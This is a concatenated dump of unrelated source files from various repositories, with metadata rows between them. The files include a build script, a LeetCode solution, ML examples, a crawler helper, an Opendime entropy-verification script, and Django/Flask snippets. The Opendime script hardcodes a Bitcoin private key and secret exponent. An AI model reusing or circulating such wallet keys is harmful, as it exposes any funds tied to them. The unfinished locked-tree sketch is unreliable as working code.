# - CFLAGS are for C-specific compilation flags
# - CXXFLAGS are for C++-specific compilation flags
# - CPPFLAGS are for pre-processor flags
# - CPPDEFINES are for pre-processor defines
# - LINKFLAGS are for linking flags
# Check our platform specifics
if env['platform'] == "osx":
env['target_path'] += 'osx/'
cpp_library += '.osx'
env.Append(CCFLAGS=['-arch', 'x86_64'])
env.Append(CXXFLAGS=['-std=c++17'])
env.Append(LINKFLAGS=['-arch', 'x86_64'])
if env['target'] in ('debug', 'd'):
env.Append(CCFLAGS=['-g', '-O2'])
else:
env.Append(CCFLAGS=['-g', '-O3'])
elif env['platform'] in ('x11', 'linux'):
env['target_path'] += 'x11/'
cpp_library += '.linux'
env.Append(CCFLAGS=['-fPIC'])
env.Append(CXXFLAGS=['-std=c++17'])
if env['target'] in ('debug', 'd'):
env.Append(CCFLAGS=['-g3', '-Og'])
else:
env.Append(CCFLAGS=['-g', '-O3'])
elif env['platform'] == "windows":
env['target_path'] += 'win64/'
cpp_library += '.windows'
# This makes sure to keep the session environment variables on windows,
# that way you can run scons in a vs 2017 prompt and it will find all the required tools
env.Append(ENV=os.environ)
env.Append(CPPDEFINES=['WIN32', '_WIN32', '_WINDOWS', '_CRT_SECURE_NO_WARNINGS'])
env.Append(CCFLAGS=['-W3', '-GR'])
if env['target'] in ('debug', 'd'):
env.Append(CPPDEFINES=['_DEBUG'])
env.Append(CCFLAGS=['-EHsc', '-MDd', '-ZI'])
env.Append(LINKFLAGS=['-DEBUG'])
else:
env.Append(CPPDEFINES=['NDEBUG'])
env.Append(CCFLAGS=['-O2', '-EHsc', '-MD'])
if env['target'] in ('debug', 'd'):
cpp_library += '.debug'
else:
cpp_library += '.release'
cpp_library += '.' + str(bits)
# make sure our binding library is properly includes
env.Append(CPPPATH=['.', godot_headers_path, cpp_bindings_path + 'include/', cpp_bindings_path + 'include/core/', cpp_bindings_path + 'include/gen/'])
env.Append(LIBPATH=[cpp_bindings_path + 'bin/'])
env.Append(LIBS=[cpp_library])
# tweak this if you want to use different folders, or more folders, to store your source code in.
env.Append(CPPPATH=['src/'])
sources = Glob('src/*.cpp')
library = env.SharedLibrary(target=env['target_path'] + env['target_name'] , source=sources)
Default(library)
# Generates help for the -h scons option.
Help(opts.GenerateHelpText(env))
| [
"50722677+TheLoveDoctor@users.noreply.github.com"
] | 50722677+TheLoveDoctor@users.noreply.github.com | |
d19481de277f3304a15ba5abd3e4aa8f62930e6d | 6a9b10d56619e254e1563714082d8f284410c311 | /Maxsum_Circular_Subarray.py | 859a9343c3c2e7e1f1a3d643ad89ca1e5af205ff | [] | no_license | syedmujahedalih/LeetCode-Submissions | c05bf820675bee2d47eb4a23b38074c9ed807bb6 | 87ffd4f14784a1fb8d4c94f5f8592c77f354d78f | refs/heads/master | 2022-11-18T11:21:16.089131 | 2020-07-12T10:20:23 | 2020-07-12T10:20:23 | 260,825,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 493 | py | class Solution(object):
def maxSubarraySumCircular(self, A):
def kadane(gen):
# Maximum non-empty subarray sum
ans = cur = None
for x in gen:
cur = x + max(cur, 0)
ans = max(ans, cur)
return ans
S = sum(A)
ans1 = kadane(iter(A))
ans2 = S + kadane(-A[i] for i in range(1, len(A)))
ans3 = S + kadane(-A[i] for i in range(len(A) - 1))
return max(ans1, ans2, ans3) | [
"syedmujahedalih@gmail.com"
] | syedmujahedalih@gmail.com |
dd4bd12c5b84fdef186166bf91e7fbfa998243fa | 51222a640bdfaf394af67601dc4e128f678743d3 | /dpc/examples/daal/gradient_boosted_classification_batch.py | f61614e29bc6e0633f53fe18c4a344e642728e37 | [] | no_license | pvelesko/testing | 8294f5cd9af5634460f3b597c582ce7ff22238d0 | 5bdc53da65f67596858825d023852f7457937211 | refs/heads/master | 2023-06-29T00:42:37.744462 | 2021-08-04T04:24:08 | 2021-08-04T04:30:37 | 392,545,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,983 | py | #*******************************************************************************
# Copyright 2014-2019 Intel Corporation
# All Rights Reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#*******************************************************************************
# daal4py Gradient Bossting Classification example for shared memory systems
import daal4py as d4p
import numpy as np
# let's try to use pandas' fast csv reader
try:
import pandas
read_csv = lambda f, c=None, t=np.float64: pandas.read_csv(f, usecols=c, delimiter=',', header=None, dtype=t)
except:
# fall back to numpy loadtxt
read_csv = lambda f, c=None, t=np.float64: np.loadtxt(f, usecols=c, delimiter=',', ndmin=2, dtype=t)
def main(readcsv=read_csv, method='defaultDense'):
nFeatures = 3
nClasses = 5
maxIterations = 200
minObservationsInLeafNode = 8
# input data file
infile = "./data/batch/df_classification_train.csv"
testfile = "./data/batch/df_classification_test.csv"
# Configure a training object (5 classes)
train_algo = d4p.gbt_classification_training(nClasses=nClasses,
maxIterations=maxIterations,
minObservationsInLeafNode=minObservationsInLeafNode,
featuresPerNode=nFeatures)
# Read data. Let's use 3 features per observation
data = readcsv(infile, range(3), t=np.float32)
labels = readcsv(infile, range(3,4), t=np.float32)
train_result = train_algo.compute(data, labels)
# Now let's do some prediction
predict_algo = d4p.gbt_classification_prediction(nClasses=nClasses)
# read test data (with same #features)
pdata = readcsv(testfile, range(3), t=np.float32)
# now predict using the model from the training above
predict_result = predict_algo.compute(pdata, train_result.model)
# Prediction result provides prediction
plabels = readcsv(testfile, range(3,4), t=np.float32)
assert np.count_nonzero(predict_result.prediction-plabels)/pdata.shape[0] < 0.022
return (train_result, predict_result, plabels)
if __name__ == "__main__":
(train_result, predict_result, plabels) = main()
print("\nGradient boosted trees prediction results (first 10 rows):\n", predict_result.prediction[0:10])
print("\nGround truth (first 10 rows):\n", plabels[0:10])
print('All looks good!')
| [
"paulius.velesko@intel.com"
] | paulius.velesko@intel.com |
2b02636ab2bc26a17af696eb2a897748dd8228e1 | 9acd885f9f36f2ceb967100840997ecc97e5bc77 | /kolichestvo _razlichniykh_chisel.py | 94250905c31d05a7fbd03af0da654ec795c34673 | [] | no_license | Botagoz-Ahm/Task-7 | b09bf5143baf377fcd801c193dfa27c59d32cb2b | 3b8d0d522ea7ff7ae79bfdbcdfdefbf2eab75c19 | refs/heads/master | 2022-06-03T22:53:27.375451 | 2020-05-02T18:56:42 | 2020-05-02T18:56:42 | 260,754,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | myList = (input().split())
mySet = (len(set((myList))))
print(mySet)
| [
"noreply@github.com"
] | noreply@github.com |
33bc1e2ac77d709acd563907b448ccc28ff6f4e0 | 91ddffce1c5167d2b4b8c3fa0150ba68779fd771 | /Euler/problem1.py | 0aefbc36206a125553154df5e79773dc053becea | [] | no_license | elbuo8/PythonSnips | 8a1a5b91e5f4eff788fb4af6a79edb467d9e3448 | 8db0cc37651dbd88df8cfa6b79291bb5deec1c7b | refs/heads/master | 2021-01-15T21:01:57.517386 | 2012-06-14T14:20:03 | 2012-06-14T14:20:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | '''
Created on Jun 7, 2012
@author: yamilasusta
'''
total = 0
for i in range(1000):
if i%3 == 0 or i%5 == 0:
total += i
print total
| [
"yamil.asusta@upr.edu"
] | yamil.asusta@upr.edu |
c8a6e95a98f1348bd94cef5d52e00616ec83951d | 086f048af5006329ab2697e23485a5b3be5bd46b | /link_finder.py | 168c75713e3f174da9f01c1654bfb566e825b1a9 | [] | no_license | derekwang1994/Web-Crawler---Python | b0d41cf74dd64a3bb4d5da842c7e7039b053a0e6 | 4c6401f7ef42a2d76ddb1caa78168f5840966a0c | refs/heads/master | 2021-01-19T23:02:16.042192 | 2017-09-15T00:55:29 | 2017-09-15T00:55:29 | 101,261,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | from html.parser import HTMLParser
from urllib import parse
from general import *
class LinkFinder(HTMLParser):
def __init__(self, base_url, page_url, keywords):
super().__init__()
self.base_url = base_url
self.page_url = page_url
self.links = set()
self.jobs = set()
self.keywords = keywords
# When we call HTMLParser feed() this function is called when it encounters an opening tag <a>
def handle_starttag(self, tag, attrs):
if tag == 'a':
self.find_job(attrs)
for (attribute, value) in attrs:
if attribute == 'href':
url = parse.urljoin(self.base_url, value)
# print('find a link: ' + url)
self.links.add(url)
def page_links(self):
return self.links
def error(self, message):
pass
def find_job(self, attrs):
url = ''
title = ''
for i in range(0, len(attrs)):
# print(attrs[i])
if attrs[i][0] == 'href':
url = attrs[i][1]
if attrs[i][0] == 'title':
name = attrs[i][1]
for keyword in self.keywords:
if keyword in name:
title = attrs[i][1]
break
if not url == '' and not title == '':
self.jobs.add('{ "Title" : "' + title + '", "URL" : "' + parse.urljoin(self.base_url, url) + '" },')
def get_jobs(self):
return self.jobs | [
"derekwang1994@yahoo.com"
] | derekwang1994@yahoo.com |
a768c2a7f1da1af77af686f85ec3b9cabda981a8 | 9f129912443acf712166209155fe071518cafa63 | /wavenet.py | b13f48c5544da960dfc5d016eba79f8a4443b834 | [] | no_license | KNFO-MIMUW/Stock_Prices_Prediction | 740b4c429caf40b1058289bfb56b6751070cb4ee | 4027642f5159aecd3d0347c6c39e19db3264cf39 | refs/heads/master | 2020-04-06T14:10:52.443302 | 2019-05-20T17:24:50 | 2019-05-20T17:24:50 | 157,531,020 | 6 | 5 | null | null | null | null | UTF-8 | Python | false | false | 6,646 | py | """
Time series forecasting based on:
1. A. Borovykh, S. Bohte, and C. W. Oosterlee, "Conditional Time Series Forecasting with Convolutional
Neural Networks", arXiv:1703.04691, Mar. 2017.
2. Google DeepMind, "Wavenet: A generative model for raw audio", arXiv:1609.03499, Sep. 2016.
3. K. Papadopoulos, "SeriesNet: A Dilated Casual Convolutional Neural Network for Forecasting" Apr. 2018
Requirements:
tensorflow==1.10.1
Keras==2.2.2
numpy==1.14.5
matplotlib==3.0.0
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import mean_absolute_error
from keras.layers import Conv1D, Input, Add, Activation, Dropout
from keras.models import Model
from keras.regularizers import l2
from keras.initializers import TruncatedNormal
from keras import optimizers
###
### DATA PREPARATION
###
# Read ford's data.
ford_data = pd.read_csv('f_us_d.csv', header=0, parse_dates=[0], index_col=0, squeeze=True)
ford_data = ford_data.truncate(before="2012-01-01", after="2015-12-31")
series_ford = ford_data[['Open']]
# Read s&p's data
# stock_data = pd.read_csv('s&p_d.csv', header=0, parse_dates=[0], index_col=0, squeeze=True)
# stock_data = stock_data.truncate(before="2000-01-01", after="2003-12-31")
# series_stock_high = stock_data[['High']]
# series_stock_low = stock_data[['Low']]
TEST_RATIO = 0.80
vseries = series_ford.values
split_val = int(TEST_RATIO * vseries.size)
dataset, tests = vseries[:split_val], vseries[split_val:]
dataset = [x[0] for x in dataset]
tests = [x[0] for x in tests]
tests = np.array(tests)
# v_high, v_low = series_stock_high.values, series_stock_low.values
# split_val_h, split_val_l = int(TEST_RATIO * v_high.size), int(TEST_RATIO * v_low.size)
# dataset_high, dataset_low = v_high[:split_val_h], v_low[:split_val_l]
# dataset_high, dataset_low = [x[0] for x in dataset_high], [x[0] for x in dataset_low]
###
### BUILD MODEL
###
def DC_CNN_Block(nb_filter, filter_length, dilation, l2_layer_reg):
def f(input_):
residual = input_
layer_out = Conv1D(filters=nb_filter, kernel_size=filter_length,
dilation_rate=dilation,
activation='relu', padding='causal', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.05,
seed=11), kernel_regularizer=l2(l2_layer_reg))(input_)
layer_out = Activation('relu')(layer_out)
skip_out = Conv1D(1, 1, activation='relu', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.05,
seed=11), kernel_regularizer=l2(l2_layer_reg))(layer_out)
network_in = Conv1D(1, 1, activation='relu', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.05,
seed=11), kernel_regularizer=l2(l2_layer_reg))(layer_out)
network_out = Add()([residual, network_in])
return network_out, skip_out
return f
def DC_CNN_Model(length):
input = Input(shape=(length, 1))
l1a, l1b = DC_CNN_Block(32, 2, 1, 0.001)(input)
l2a, l2b = DC_CNN_Block(32, 2, 2, 0.001)(l1a)
l3a, l3b = DC_CNN_Block(32, 2, 4, 0.001)(l2a)
l4a, l4b = DC_CNN_Block(32, 2, 8, 0.001)(l3a)
l5a, l5b = DC_CNN_Block(32, 2, 16, 0.001)(l4a)
l6a, l6b = DC_CNN_Block(32, 2, 32, 0.001)(l5a)
l7a, l7b = DC_CNN_Block(32, 2, 64, 0.001)(l6a)
# l7b = Dropout(0.1)(l7b)
l8a, l8b = DC_CNN_Block(32, 2, 128, 0.001)(l7a)
# l8b = Dropout(0.2)(l8b)
# l9a, l9b = DC_CNN_Block(32, 2, 256, 0.001)(l8a)
# l9b = Dropout(0.3)(l9b)
# l10a, l10b = DC_CNN_Block(32, 2, 512, 0.001)(l9a)
# l10b = Dropout(0.6)(l10b)
lx = Add()([l1b, l2b, l3b, l4b, l5b, l6b, l7b, l8b])#, l9b])#, l10b])
lf = Activation('relu')(lx)
output_l = Conv1D(1, 1, activation='relu', use_bias=False,
kernel_initializer=TruncatedNormal(mean=0, stddev=0.05, seed=11),
kernel_regularizer=l2(0.001))(lf)
model = Model(input=input, output=output_l)
adam = optimizers.Adam(lr=0.00075, beta_1=0.9, beta_2=0.999, epsilon=None,
decay=0.0, amsgrad=False)
model.compile(optimizer=adam, loss='mae', metrics=['mse'])
return model
def evaluate_timeseries(timeseries, predict_size):
timeseries = timeseries[~pd.isna(timeseries)]
length = len(timeseries) - 1
timeseries = np.atleast_2d(np.asarray(timeseries))
if timeseries.shape[0] == 1:
timeseries = timeseries.T
model = DC_CNN_Model(length)
print('\nInput size: {}\nOutput size: {}'.
format(model.input_shape, model.output_shape))
model.summary()
X = timeseries[:-1].reshape(1, length, 1)
y = timeseries[1:].reshape(1, length, 1)
model.fit(X, y, epochs=1000)
pred_array = np.zeros(predict_size).reshape(1, predict_size, 1)
observation = np.zeros(predict_size).reshape(1, predict_size, 1)
X_test_initial = timeseries[1:].reshape(1, length, 1)
for i in range(predict_size):
observation[:, i, :] = tests[i]
pred_array[:, 0, :] = model.predict(X_test_initial)[:, -1:, :]
# Forecast is based on the observations up to previous day.
for i in range(predict_size - 1):
pred_array[:, i + 1:, :] = model.predict(
np.append(X_test_initial[:, i + 1:, :], observation[:, :i + 1, :])
.reshape(1, length, 1), batch_size=32)[:,-1:, :]
# stddev = (dataset_high[i + 1] - dataset_low[i + 1]) / dataset_high[i + 1]
# pred_array[:, i + 1:, :] = model.predict(np.append(X_test_initial[:, i + 1:, :], np.random.normal(observation[:, :i + 1, :], stddev)).reshape(1, length, 1))[:, -1:, :]
# Forecast for the next day based on the predictions.
#
# pred_array[:, i + 1:, :] = model.predict(np.append(X_test_initial[:, i + 1:, :],
# pred_array[:, :i + 1, :])
# .reshape(1, length, 1))[:, -1:, :]
return pred_array.flatten()
predictions = evaluate_timeseries(np.array(dataset), len(tests))
mae = mean_absolute_error(tests, predictions)
print('Loss (mean absolute error): ', mae)
# plt.plot(dataset + tests, color='yellow')
# plt.plot(dataset, color='orange')
plt.plot(tests, color='orange', label='True data')
plt.plot(predictions, label= 'Predictions')
plt.legend(loc='upper left')
plt.xlabel('Days')
plt.ylabel('Price')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
64eeead6469a2f19391005c14238c5e10af48198 | f402071c3b454ab12377e835306b8e8d5d961767 | /v2.4/unsealed/advanced/rngverify.py | a7ce687167a2e6c08126e4a97c5395d70bbb6e92 | [] | no_license | opendime/opendime | 2f47ec08a5c51082590c7246a2579c7517f7a1ea | 396c52085c22242346258f839093fe15b850d85b | refs/heads/master | 2021-11-13T21:52:47.583955 | 2021-10-29T23:28:43 | 2021-10-29T23:28:43 | 59,141,180 | 131 | 30 | null | 2021-10-29T23:28:44 | 2016-05-18T18:28:08 | HTML | UTF-8 | Python | false | false | 2,597 | py | #!/usr/bin/env python
from __future__ import print_function
from binascii import a2b_hex
ADDRESS = '1P431tezawsLq7ZDPqfp8CnGGKxuYpLTKR '.strip()
PRIVKEY = '5K6QFi35PZaHqrP1G3wLv7n8sV29cmz2tU4gkMYzfTkEx463NkJ'.strip()
OD_NONCE = a2b_hex('7a4deec6d8714f9e03988603789d20fa6cc3fb7921a6e51e0f4e5de75b3d3813')
SECRET_EXPONENT = a2b_hex('a8498ba6db5d470dd40db3dd0508b15f1fadd828bc4db16d7a4b64d0c5ba8f1e')
CHIP_SERIAL = b'JETJEECBIZIFCIBAEBGDGBIU74'
# The above numbers can be used to prove we picked the private key using
# an algorithm that included the entropy values you provided, and therefore
# does not allow us any access to the funds. This program checks our math.
#
# Usage:
# python rngverify.py keepme.bin
#
# Example (simplified, MacOS X):
#
# dd if=/dev/urandom bs=256k count=1 > ~/keepme.bin
# diskutil info /Volumes/OPENDIME/ | grep /dev/disk
# ==> replace /dev/diskXXX in next line -- be VERY careful!! <==
# sudo dd if=~/keepme.bin of=/dev/diskXXX
# (.. device will self-eject ..)
# (.. time passes, then unseal opendime ..)
# python /Volumes/OPENDIME/advanced/rngverify.py ~/keepme.bin
#
#
import os, sys
from hashlib import sha256
SIZE = 256*1024
try:
assert len(sys.argv) >= 2, "entropy data filename required"
data = open(sys.argv[-1], 'rb').read(SIZE)
assert len(data) == SIZE, "too short"
except:
print("Need 256k bytes of data originally written during setup.\n")
raise
# Secret exponent will be the double-SHA256 hash of:
#
# 1) customer data (256k bytes)
# 2) usb serial number of unit (base32 encoding of 128-bit number: 26 chars)
# 3) a random number picked by device (device nonce: 256 bits)
#
should_be = sha256(sha256(data + CHIP_SERIAL + OD_NONCE).digest()).digest()
if should_be != SECRET_EXPONENT:
print("\nFAILED: You probably didn't record exactly the bytes written to this drive.")
raise SystemExit
print("STEP1: Secret exponent is hash of things we expected (good).")
# Optional: verify the secret exponent is the basis of the private key
try:
import pycoin
from pycoin.key import Key
except:
print("\nNeed pycoin installed for complete check: pip install 'pycoin>=0.76'\n")
raise SystemExit
# pull out secret key from provided secret key
k = Key.from_text(PRIVKEY)
expect = pycoin.encoding.to_bytes_32(k.secret_exponent())
if expect == should_be and k.address() == ADDRESS:
print("\nSUCCESS: Private key uses secret exponent we expected. Perfect.")
else:
print("\nFAILED: Something went wrong along the way. Is this the right private key?")
# EOF
| [
"peter@conalgo.com"
] | peter@conalgo.com |
42cc9b12576207bc472765276c289082274ca608 | 8df3eea11bb8a88a03166e70eb1d77f7e307916c | /manage.py | 35843ce4b130bd95065a9b0106a91706bd69d305 | [] | no_license | geekyAmitchaurasia/djangoproj11 | 7a6acf09a2b7903dcae14d5b24fe2341ace4a8d3 | 9304a112d28dec32a46051216ef2d47b26291710 | refs/heads/master | 2020-03-26T06:35:35.635807 | 2018-08-13T17:38:22 | 2018-08-13T17:38:22 | 144,611,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoproj11.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"amitchaurasia37@gmail.com"
] | amitchaurasia37@gmail.com |
46f50d9f595eb37b882f64158e40a5c7fc5d015c | 1118bb87f67c2c619fff06eb8253533fd645dd1e | /Flask Main Server/route/auth.py | 88d66a2e0d7d75e48625eda54ba6259d7849ab60 | [] | no_license | sunsunza2009/Image-Classifier-Web-GUI | c37e4d97d84c63565774f274f47771cc739d5686 | 58ff59a0a9752b72dd411fd996538bc366cfb356 | refs/heads/master | 2022-04-08T19:20:27.200469 | 2020-03-13T10:22:30 | 2020-03-13T10:22:30 | 239,337,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,385 | py | from flask import Blueprint, jsonify, session, request, redirect, url_for, render_template
from database import Database
app = Blueprint('AUTH', __name__)
db = Database()
@app.route('/login', methods=['GET', 'POST'])
def login():
if 'username' in session:
return redirect(url_for('index'))
if request.method == 'POST':
username = request.form['username']
pwd = request.form['password']
res, usr_id, apikey = db.login(username,pwd)
if(res):
session['username'] = username
session['id'] = usr_id
session['key'] = apikey
return redirect(url_for('index'))
else:
return render_template("login.html",user=username)
return render_template("login.html",user="")
@app.route('/register', methods=['GET', 'POST'])
def register():
if 'username' in session:
return redirect(url_for('index'))
if request.method == 'POST':
username = request.form['username']
email = request.form['email']
pwd = request.form['password']
res = db.register(username,email,pwd)
if(res):
return render_template("login.html",user=username)
else:
return render_template("register.html",user=username)
return render_template("register.html",user="")
@app.route('/logout')
def logout():
# remove the username from the session if it's there
session.pop('id', None)
session.pop('username', None)
session.pop('key', None)
return redirect(url_for('index')) | [
"14806377+zugetor@users.noreply.github.com"
] | 14806377+zugetor@users.noreply.github.com |
367d5083a97e5d006b5ed778da35518abfec3376 | 3f50e7f6894fc8eea825502b846dc0967493f7a4 | /doc-src/objects/index.py | 53bceb10edb9127c2df0acace412c55eba5bbc78 | [
"MIT"
] | permissive | bavardage/qtile | 92e62bc3195f3cfb0059afaa3dd008bd490caa6a | c384d354f00c8d025d0eff3e5e292303ad4b4e58 | refs/heads/master | 2021-01-16T00:49:34.141225 | 2009-03-26T16:54:51 | 2009-03-26T16:54:51 | 106,682 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | from countershape.doc import *
pages = [
Page("barsngaps.html", "Bars and Gaps"),
Page("groups.html", "Groups"),
Page("layouts.html", "Layouts"),
Page("screens.html", "Screens"),
Page("widgets.html", "Widgets"),
]
| [
"aldo@nullcube.com"
] | aldo@nullcube.com |
dffb8f1d28234925bf2aa668f60bba767b675746 | f1a5d89b17e3bf0f354546cc47c329a81f15dfc9 | /apps/__init__.py | 9827ad08f3307fbdc79dfbb87ce314af564b62c8 | [] | no_license | lucassimon/civilizations | 067193e17e7651a9fecb53f2b6e459c15ff4c97b | db8db27bb56ccda8c23059de88c60ef8d9670cb0 | refs/heads/master | 2020-03-29T13:16:01.025175 | 2018-12-29T18:22:45 | 2018-12-29T18:22:45 | 149,949,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | # -*- coding: utf-8 -*-
# Python Libs.
from vibora import Vibora, Response
# -*- coding: utf-8 -*-
from vibora.hooks import Events
from .config import config
from .api import api
def create_app(config_name):
app = Vibora()
@app.handle(Events.AFTER_ENDPOINT)
async def before_response(response: Response):
response.headers['x-my-custom-header'] = 'Hello :)'
app.components.add(config[config_name]())
app.add_blueprint(api, prefixes={'v1': '/v1'})
return app
| [
"lucassrod@gmail.com"
] | lucassrod@gmail.com |
574e02bc0618918ca8d833a05d6771caed6c0d4b | 7871437a6174b73a2e9a1bf1e7cc73288923bae1 | /StackHack/StackHack/urls.py | 82ae4f03e832ccfa11bff8c030c43939d6893161 | [] | no_license | HarshilShrivastava/StackHAck | f4e0a22a9addbd8cc843be639e869fcc9730aefb | d1c5fc67be592cf2e0b279f03c24b0a71bef7cb4 | refs/heads/master | 2023-08-15T14:13:49.288802 | 2021-04-12T04:25:19 | 2021-04-12T04:25:19 | 266,839,559 | 0 | 0 | null | 2021-09-22T19:05:48 | 2020-05-25T17:25:48 | JavaScript | UTF-8 | Python | false | false | 923 | py | """StackHack URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from user.api.v0.views import index
urlpatterns = [
path('admin/', admin.site.urls),
path('user/',include('user.api.v0.urls')),
path('Todo/',include('todo.api.v0.urls')),
path('',index,name="homepage")
]
| [
"Shrivastavahharshil12@gmail.com"
] | Shrivastavahharshil12@gmail.com |
d4a4964518e94e04e43b8698be6b2709644b4fcf | 6fb0f2454da536882d195faded18656ea8074ed4 | /django_ltree_utils/forms.py | 73f8eea2b65952321b5671103a2e3bb6c8936c12 | [
"BSD-3-Clause"
] | permissive | CDavantzis/django-ltree-utils | f401827259c27172f548a4374baea49beb0b09a9 | 97ff0e221743ed47bd2e690ae3ee969bc100c1ef | refs/heads/master | 2023-07-17T01:19:18.664758 | 2021-08-25T16:57:03 | 2021-08-25T16:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,572 | py | from django import forms
def move_node_form_factory(manager):
class Form(forms.ModelForm):
position = forms.ChoiceField(choices=manager.Position.choices)
relative_to = forms.ModelChoiceField(
queryset=manager.all(), required=False
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.instance and self.instance.path:
self.fields['relative_to'].queryset = manager.exclude(
**{f'{manager.path_field}__descendant_of': getattr(self.instance, manager.path_field)}
)
position, relative_to = manager._get_relative_position(self.instance)
self.fields['position'].initial = position
self.fields['relative_to'].initial = relative_to
class Meta:
model = manager.model
exclude = [manager.path_field]
def clean(self, *args, **kwargs):
cleaned_data = super().clean(*args, **kwargs)
position = cleaned_data['position']
relative_to = True if manager.Position(position) == manager.Position.ROOT else cleaned_data['relative_to']
moves = manager._resolve_position(
self.instance, {
position: relative_to
}
)
self.cleaned_data['_moves'] = moves
def save(self, *args, **kwargs):
manager._bulk_move(self.cleaned_data['_moves'])
return super().save(*args, **kwargs)
return Form
| [
"john.parton.iv@gmail.com"
] | john.parton.iv@gmail.com |
84f76a870e2ebb01edf941894ff23d363415fefc | ba9174be0c9312f2e34be1ba512db8bc1c71b024 | /lesson3/mysql/lesson0/app1.py | d07095dad09f55e3a33948397f4b8eef7fe39c54 | [] | no_license | Aliazhari/web-dev-python | 8105caa97e9619ac67cce3c634c0775f8409a10e | 1e5c76cdb63a0bd43d0747a153944f2a71ae7ca0 | refs/heads/master | 2020-04-17T09:59:31.903817 | 2019-05-15T20:48:48 | 2019-05-15T20:48:48 | 166,483,161 | 0 | 1 | null | 2019-01-22T03:59:21 | 2019-01-18T23:00:05 | Python | UTF-8 | Python | false | false | 220 | py | # Author: Ali Azhari
import mysql.connector
mydb = mysql.connector.connect(
host="localhost",
user="ali",
passwd="ali"
)
mycursor = mydb.cursor()
mycursor.execute("SHOW DATABASES")
for x in mycursor:
print(x) | [
"Aliazhari@hotmail.com"
] | Aliazhari@hotmail.com |
84f2ef9d7c6e1bbc2b274b9267ce6316e3588d2d | 7d915f17983f2585cf600c1b97ae060dd48967b0 | /WordCounter/Untitled.py | c1572e72b164c8b62a318d5a01aa39c75266c519 | [] | no_license | aduxhi/learnpython | ca8b241d0b945fa29a53ba9a3ccb46640799e141 | b72144c258d07915936908214ec0a1bcd8a0c56a | refs/heads/master | 2022-12-13T03:44:35.136137 | 2020-09-02T14:24:42 | 2020-09-02T14:24:42 | 291,760,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | from os import path
from wordcloud import WordCloud
from collections import Counter
import jieba
d = path.dirname(__file__)
f = open(path.join(d, '十九大报告.txt')).read()
words = list(jieba.cut(f))
data = dict (Counter(words).most_common(50))
with open ("十九大词频.txt",'w',encoding= 'utf-8') as fw:
for k,v in data.items():
fw.write("%s\t%d\n" %(k,v))
print('hello\tworld') | [
"aduxhi@aduxhideMBP.lan1"
] | aduxhi@aduxhideMBP.lan1 |
01d1ca7a568a563b1a79e26269f36e7c154cf789 | 31d5098fd714172a82d655f314c8b8ee3d7b13d0 | /autokey/data/ptaylor/cmd-preferences.py | bbd19ea52d0aaa6794a2dc053d80a6e4ae75cf2c | [] | no_license | trxcllnt/ubuntu-setup | cabf75f917115c40a585187f2a0a045c9c1863d6 | 135247f08dcf4709684ec867efd9c494e5b323b0 | refs/heads/master | 2023-08-22T19:23:21.676537 | 2023-08-05T19:04:02 | 2023-08-05T19:04:02 | 197,261,945 | 30 | 9 | null | 2021-11-30T01:10:39 | 2019-07-16T20:22:09 | Shell | UTF-8 | Python | false | false | 115 | py | store.set_global_value('hotkey', '<alt>+,')
store.set_global_value('keycmd', '<ctrl>+,')
engine.run_script('combo') | [
"paul.e.taylor@me.com"
] | paul.e.taylor@me.com |
1a5a3f46a3ef3e94d37b2d4f016f99a117c59da5 | 5704bf1f4e8d3bc0ded23406d5cd0dc93412ea27 | /python/python_questions/locked_binary_tree.py | d4bf97884c0a949bafaa7981567ef64923147dc1 | [] | no_license | apollopower/interview-prep | c6854b0e15a516fe46993f72ca8922f74881ec49 | 4d53b473efc001d41b989131762f0deaee5c7b13 | refs/heads/master | 2020-03-27T08:14:24.951750 | 2019-04-03T20:27:21 | 2019-04-03T20:27:21 | 146,235,471 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | # locked binary tree problem
class TreeNode:
def __init__(self, val):
self.val = val
self.locked = False
self.left = None
self.right = None
def is_locked(self):
return self.locked
def lock(self):
if self.left:
self.left.lock()
if self.right:
self.right.lock()
if self.is_locked():
return False
def unlock(self):
pass
def add_node(root, val):
if not root:
return TreeNode(val)
